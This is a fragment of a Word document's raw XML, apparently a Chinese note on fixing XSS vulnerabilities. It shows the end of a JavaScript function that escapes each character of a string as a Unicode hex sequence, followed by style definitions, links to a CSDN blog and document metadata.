    <w:p w14:paraId="6D69D96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var a4 = c%16;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C5ECCF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c = Math.floor(c/16); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A711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var a3 = c%16;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5570E8B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c = Math.floor(c/16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679D06F4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var a2 = c%16;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E20A14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c = Math.floor(c/16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D6C93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var a1 = c%16;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF279A9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return "\\u"+hex[a1]+hex[a2]+hex[a3]+hex[a4]+"";        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731F5BB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ACB64A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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA06EE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    return changeTo16Hex(original);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0548AE5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5054AC8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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6A7820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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793E4400" w14:textId="36A2398A" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3B83F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var preescape = str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438039A7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var escaped = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2930A3AC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var i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A03B575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for(i=0; i &lt; preescape.length; i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B551748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    escaped = escaped + encodeCharx(preescape.charAt(i));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6AED76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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324AC92" w14:textId="77777777" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return escaped;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36120A05" w14:textId="40FD3BAC" w:rsidR="00F84FFD" w:rsidRDefault="00F84FFD" w:rsidP="00F84FFD">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F84FFD" w:rsidSect="00CB717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A53"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6338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D5F04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D48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E2380"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="217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71"/>
    <w:rsid w:val="000C0A3F"/>
    <w:rsid w:val="00181E7D"/>
    <w:rsid w:val="001E2E38"/>
    <w:rsid w:val="001E762A"/>
    <w:rsid w:val="00417192"/>
    <w:rsid w:val="004E7538"/>
    <w:rsid w:val="005755AC"/>
    <w:rsid w:val="005E4A99"/>
    <w:rsid w:val="005F7FE5"/>
    <w:rsid w:val="006A0567"/>
    <w:rsid w:val="00920AD0"/>
    <w:rsid w:val="00930661"/>
    <w:rsid w:val="009C7088"/>
    <w:rsid w:val="00A57311"/>
    <w:rsid w:val="00A916E1"/>
    <w:rsid w:val="00A93612"/>
    <w:rsid w:val="00AB10F5"/>
    <w:rsid w:val="00B02498"/>
    <w:rsid w:val="00B97FBE"/>
    <w:rsid w:val="00C67BE6"/>
    <w:rsid w:val="00CB7171"/>
    <w:rsid w:val="00D455FA"/>
    <w:rsid w:val="00D45D96"/>
    <w:rsid w:val="00E302F3"/>
    <w:rsid w:val="00E8614C"/>
    <w:rsid w:val="00F52879"/>
    <w:rsid w:val="00F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8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717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717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171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CB717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B7171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CB71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CB7171"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005F7FE5"/>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="005F7FE5"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005F7F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E7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E762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8687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04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ghsau/article/details/17027893" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/ghsau" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/ghsau/article/details/1702789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1077</Words>
  <Characters>6141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XSS 漏洞修复</vt:lpstr>
      <vt:lpstr>    Html encode</vt:lpstr>
      <vt:lpstr>如何测试XSS漏洞</vt:lpstr>
    </vt:vector>
  </TitlesOfParts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2017-09-07T08:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-19T09:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>